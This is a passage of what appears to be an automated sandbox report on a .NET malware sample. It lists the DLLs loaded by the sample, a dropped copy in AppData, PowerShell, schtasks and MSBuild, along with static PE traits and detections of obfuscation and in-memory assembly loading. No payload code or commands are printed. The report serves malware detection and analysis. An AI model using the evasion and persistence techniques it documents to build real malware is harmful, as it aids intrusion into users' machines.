              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
              Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: dwrite.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iconcodecservice.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winmm.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: urlmon.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wininet.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iertutil.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: srvcli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: netutils.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: sspicli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: winmm.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: urlmon.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: wininet.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iertutil.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: srvcli.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: netutils.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: file.exe | Static file information: File size 1075712 > 1048576
              Source: file.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x103600
              Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.cs | .Net Code: mE77pT8gqx System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.3f15b78.0.raw.unpack, MainForm.cs | .Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.cs | .Net Code: mE77pT8gqx System.Reflection.Assembly.Load(byte[])
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, BxloEJ2ukLoPetmOQZ.cs | .Net Code: mE77pT8gqx System.Reflection.Assembly.Load(byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCE3
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140E9B8 pushfd ; retf 0_2_0140E9B9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140F550 pushad ; iretd 0_2_0140F559
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0140DBE4 pushfd ; ret 0_2_0140DBED
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0546E4F0 push B402E9DBh; ret 0_2_0546E4F5
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe | Code function: 9_2_015BE9B8 pushfd ; retf 9_2_015BE9B9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_004567E0 push eax; ret 12_2_004567FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00433FF6 push ecx; ret 12_2_00434009
              Source: file.exe | Static PE information: section name: .text entropy: 7.759878429446134
              Source: DcBNSgyxoJFip.exe.0.dr | Static PE information: section name: .text entropy: 7.759878429446134
              Source: 0.2.file.exe.4afc538.2.raw.unpack, I1tqhMsitN66Pt9vOL.cs | High entropy of concatenated method names: 'Dispose', 'TW0v5L4yTT', 'Vftad1hEr6', 'z8Ujmv4Q0c', 'G6MvoWJZSY', 'opWvzHKdJt', 'ProcessDialogKey', 'YveauYSqfG', 'djlavfxJj6', 'NDlaa69xFA'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, pPBPfxvJqfrSovQWaVx.cs | High entropy of concatenated method names: 'lfccokR6Ln', 'AcKczE3wn1', 'JmhSuH4up9', 'SUmt53hE53WSdqZAZ4b', 'B6Yud51bqcSuUKx3Ek6', 'BmTOQ51zrOVFOAroM8o', 'ijATOjhDhfpJlFnytyw', 'H92O1OhXITdcCp18io2'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, L9xFARoPmTUYlrdcmh.cs | High entropy of concatenated method names: 'lQMBPFiKy6', 'VegBxMpp7B', 'MDvBCnuMVE', 'vA2BFbn8qt', 'vGcBMbDo1I', 'a7xB2HyjBi', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, BxloEJ2ukLoPetmOQZ.cs | High entropy of concatenated method names: 'ITEJQ2W8g6', 'QpBJGTCTkU', 'SdpJs2Iipt', 'dU0JPX8PXj', 'CgXJxQYDT8', 'NV2JCJU866', 'palJFytWfj', 'hI0J2dixcn', 'rdWJwrbfPW', 'qYAJgWiMsk'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, xDB6PJ8ZAA2Vc38ho2.cs | High entropy of concatenated method names: 'T1nCQVBpIX', 'xAcCsFBGNV', 'uKfCxasdDp', 'yx1CFhQNyd', 'HdnC2yopUl', 'jR9xiXUNEq', 'hdmxfBSuSe', 'sInx016fRH', 'dTBxjvyOTs', 'Kpkx5GcuDj'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, gn7PDCv78mC8RSHZAsG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QlsSM8qyMT', 'Y6TSBk4EGL', 'cU5ScgruVM', 'mNtSSoAZfG', 'OvnSR8Rfk5', 'Ac0SHTr99l', 'YnRSNsUuQP'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, iklBj6nh8xKEL1t5aN.cs | High entropy of concatenated method names: 'XF4FGi93Ph', 'A3DFPGNs5F', 'LSLFCp83RN', 'lhyCovT9YJ', 'RLsCzm4UBO', 'sq7FuY7viB', 'aGYFv8bcQb', 'hpqFa3LrUq', 'qd9FJEx8SJ', 'RoXF78w44f'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, maF3W0bye86jqflJPh.cs | High entropy of concatenated method names: 'nPDqeC14Ip', 'sg0qO3cpKq', 'zdNq84oNv1', 'gadqd5ec62', 'bONqWL5Tyu', 'fqMqKt6k1Z', 't0hqnfgqcx', 'ynJq6yqIrl', 'JlfqX2nsEQ', 'iNlqIqwx3h'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, ilyiiFeo9pEQDT6PeR.cs | High entropy of concatenated method names: 'oZks3AlmCh', 'Rjksk5d6Qh', 'JWQsV4OUHE', 'bw9smrVk5u', 'FNAsiXsyyP', 'uwwsfF1jdN', 'Uuvs0HofqK', 'mP8sjIeSHA', 'SNAs56uO3H', 'CjlsoRUgiF'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, wsToelauAL4QSYIHRl.cs | High entropy of concatenated method names: 'rl4p1bIZi', 'VVN4LJgF9', 'c321M6roi', 'JjeEKwxKn', 'aLSOuDB4G', 'jEUrMN7Qp', 'VR7deDj3HpdnaQMDSL', 'TLjRAmMOGtBXPTjpq8', 'EEcDwBGmQ', 'gdcBC9bdI'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, ejF1favvTDacTwdwLoy.cs | High entropy of concatenated method names: 'hdMBoKdd1j', 'n9qBzkof0O', 'huecurBK5d', 'ASTcvtEpH8', 'gBncaixFNS', 'BLucJWZneg', 'yO7c7gs9r5', 'hDPcQghw0Q', 'ahGcG3yvV0', 'yYUcsLn2RR'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, nrTMXVzus5p3wVwY83.cs | High entropy of concatenated method names: 'iZWB1WOjD1', 'dttBerPcxu', 'tiMBOIRGqO', 'aoLB8PHZGi', 'KD1BdlTofb', 'uldBWX7Zry', 'u5eBKFVk5V', 'drTBNRvvR6', 'aLmBThmqr3', 'PYHBAH3yu6'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, Ov9AGc7SIaCE1ftaPC.cs | High entropy of concatenated method names: 'z3CvFlyiiF', 'Y9pv2EQDT6', 'gEqvgepEsg', 'vK3vhNXOQ9', 'pxSvyQ5TDB', 'LPJvLZAA2V', 'U3nLx0TUPafp9sXpA0', 'hbQrROrfrd01VRs3Pj', 'Uv2vvjy9q9', 'HLGvJug2BJ'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, NOQ9uxrnD6fd9LxSQ5.cs | High entropy of concatenated method names: 'vPOxlMLpNp', 'odpxE8vQ9n', 'JmwPZKLh45', 'XbPPWjVR9w', 'a2DPKP3IVF', 'asYPYXRuDQ', 'so6Pnvp1Sc', 'gnQP6iP2yL', 'jm7P97d5sP', 'PpyPXs2VRq'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, DYSqfG57jlfxJj6XDl.cs | High entropy of concatenated method names: 'ENwM81D6Rj', 'J9uMdYqwvX', 'dLWMZ7JKNb', 'X1pMWl6Mhp', 'wCOMKehgAA', 'oM5MYKUw5x', 'wCNMnoVwPS', 'GCKM6BNFRm', 'VhoM9xUJqO', 'a4HMXg1CV7'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, A4sPow0AQmW0L4yTTd.cs | High entropy of concatenated method names: 'chvMyZBGZO', 'fVnMU0yfuT', 'eqPMMcn2Oy', 'g4DMckFgSS', 'lG1MRF1bQc', 'ATxMNEinch', 'Dispose', 'll5DGkj54t', 'FnODsBhhqR', 'YT7DP2CaYr'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, TwuCJPVNKQBdk2rjXt.cs | High entropy of concatenated method names: 'ToString', 'zi0LIC1l0u', 'epcLdIQs6N', 'A6VLZKyDns', 'gkOLWEOKgU', 'BKjLKRg2eX', 'ox6LYmoJh2', 'NWkLnSteon', 'Ti5L61DGti', 'PHdL9j4vdX'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, T5YTX1WQkmmqWAJ8l4.cs | High entropy of concatenated method names: 'Yt4CNdLV5a', 'LylCT3Ml5U', 'JEXCpCEYyZ', 'l93C4xBRgY', 'D6iC1cHxJ4', 'c9pCELIKhQ', 'drFCO8wq3H', 'eY6CrtmpNM', 'AlRZP7X3PSXjjsbcKb9', 'WuCVElXe0qMx7nHrhu2'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, nONc9n3HVcDQ9CoFUl.cs | High entropy of concatenated method names: 'DwSyX5IHdC', 'E9qytN1qHP', 'wL8y3hFfeK', 'kPmykbLlwA', 'DmEydMpUit', 'gBlyZCLVXJ', 'N9tyWFOmDO', 's2jyKJraH3', 'q7HyYF73U8', 'n2PynnQgmu'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, quwUQi90ioWypYE7oF.cs | High entropy of concatenated method names: 'qDoFTfXm7T', 'PWxFAp9sJ8', 'fssFpcwNk9', 'JA3F4hhd5c', 'hApFlf38qp', 'PvMF1O8CDI', 'z77FEctfvJ', 'V93Fe54M6S', 'xc0FOhN891', 'gByFr5nkmP'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, J1hgTPOEqepEsgRK3N.cs | High entropy of concatenated method names: 'WJpP4jqG63', 'PlkP1cQorm', 'wGYPeo8hR5', 'hSbPOc4ZNX', 'u7PPyJwhsE', 'QpQPLKp18b', 'GptPUCrm5D', 'JGvPD6KBET', 'UxUPMfgBJr', 'fL8PBu2RDd'
              Source: 0.2.file.exe.4afc538.2.raw.unpack, S05RV5fOjYvyiPaZTY.cs | High entropy of concatenated method names: 'IXXUjt6UF5', 'YcOUo9eGAC', 'h0qDuFU5DV', 'afEDv8uYA0', 'DRKUIBpJpP', 'h6bUtMJcZf', 'L06UbDy8xt', 'mcrU3IuqLD', 'YTuUkjmbZs', 'tN5UV5ataS'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, I1tqhMsitN66Pt9vOL.cs | High entropy of concatenated method names: 'Dispose', 'TW0v5L4yTT', 'Vftad1hEr6', 'z8Ujmv4Q0c', 'G6MvoWJZSY', 'opWvzHKdJt', 'ProcessDialogKey', 'YveauYSqfG', 'djlavfxJj6', 'NDlaa69xFA'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, pPBPfxvJqfrSovQWaVx.cs | High entropy of concatenated method names: 'lfccokR6Ln', 'AcKczE3wn1', 'JmhSuH4up9', 'SUmt53hE53WSdqZAZ4b', 'B6Yud51bqcSuUKx3Ek6', 'BmTOQ51zrOVFOAroM8o', 'ijATOjhDhfpJlFnytyw', 'H92O1OhXITdcCp18io2'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, L9xFARoPmTUYlrdcmh.cs | High entropy of concatenated method names: 'lQMBPFiKy6', 'VegBxMpp7B', 'MDvBCnuMVE', 'vA2BFbn8qt', 'vGcBMbDo1I', 'a7xB2HyjBi', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, BxloEJ2ukLoPetmOQZ.cs | High entropy of concatenated method names: 'ITEJQ2W8g6', 'QpBJGTCTkU', 'SdpJs2Iipt', 'dU0JPX8PXj', 'CgXJxQYDT8', 'NV2JCJU866', 'palJFytWfj', 'hI0J2dixcn', 'rdWJwrbfPW', 'qYAJgWiMsk'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, xDB6PJ8ZAA2Vc38ho2.cs | High entropy of concatenated method names: 'T1nCQVBpIX', 'xAcCsFBGNV', 'uKfCxasdDp', 'yx1CFhQNyd', 'HdnC2yopUl', 'jR9xiXUNEq', 'hdmxfBSuSe', 'sInx016fRH', 'dTBxjvyOTs', 'Kpkx5GcuDj'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, gn7PDCv78mC8RSHZAsG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QlsSM8qyMT', 'Y6TSBk4EGL', 'cU5ScgruVM', 'mNtSSoAZfG', 'OvnSR8Rfk5', 'Ac0SHTr99l', 'YnRSNsUuQP'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, iklBj6nh8xKEL1t5aN.cs | High entropy of concatenated method names: 'XF4FGi93Ph', 'A3DFPGNs5F', 'LSLFCp83RN', 'lhyCovT9YJ', 'RLsCzm4UBO', 'sq7FuY7viB', 'aGYFv8bcQb', 'hpqFa3LrUq', 'qd9FJEx8SJ', 'RoXF78w44f'
              Source: 0.2.file.exe.7da0000.5.raw.unpack, maF3W0bye86jqflJPh.cs | High entropy of concatenated method names: 'nPDqeC14Ip', 'sg0qO3cpKq', 'zdNq84oNv1', 'gadqd5ec62', 'bONqWL5Tyu', 'fqMqKt6k1Z', 't0hqnfgqcx', 'ynJq6yqIrl', 'JlfqX2nsEQ', 'iNlqIqwx3h'
